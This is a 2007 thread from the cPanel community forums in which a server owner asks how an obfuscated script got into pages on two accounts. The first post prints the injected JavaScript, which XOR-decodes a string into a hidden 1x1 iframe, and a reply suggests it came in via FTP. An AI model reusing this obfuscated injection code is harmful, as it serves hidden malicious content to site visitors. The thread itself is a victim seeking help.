Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Weird code on my page - possible server hack?

Discussion in 'General Discussion' started by dob3rman, May 5, 2007.

  1. dob3rman

    dob3rman Active Member

    Feb 13, 2005
    Likes Received:
    Trophy Points:
    Hi anyone can help? I found out that my server has many pages with this code:

    <script language="JavaScript">e = '0x00' + '24';str1 = "%9F%C7%CC%D1%BB%D6%D7%DC%CF%C0%98%85%D1%CC%D6%CC%C5%CC%CF%CC%D7%DC%9D%C3%CC%C7%C7%C0%C9%85%99%9F%CC%C1%D5%C4%C8%C0%BB%D6%D5%C6%98%85%C3%D7%D7%CB%9D%8A%8A%D6%D0%D1%C6%C9%D7%89%C6%CA%C8%8A%CF%C7%8A%D0%CB%CF%8A%85%BB%D2%CC%C7%D7%C3%98%94%BB%C3%C0%CC%C2%C3%D7%98%94%99%9F%8A%CC%C1%D5%C4%C8%C0%99%9F%8A%C7%CC%D1%99";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

    Translated it gives:
    <iframe src="" width=1 height=1></iframe>

    The question is HOW this can be inserted into my webpage? someone has the root password of my server? because it was inserted on 2 differents accounts (with not the same user/password).

    Any clue?
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  2. pjman

    pjman Well-Known Member

    Mar 22, 2003
    Likes Received:
    Trophy Points:
    New York
    We're seeing this alot.

    See the current thread on this here:

    No one knows for sure why. It was probably added via FTP. Pure or Pro FTP, it happens on. Some people had success from further blocking it by changing to stronger passwords, but others have said the strong passwords don't help either.

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice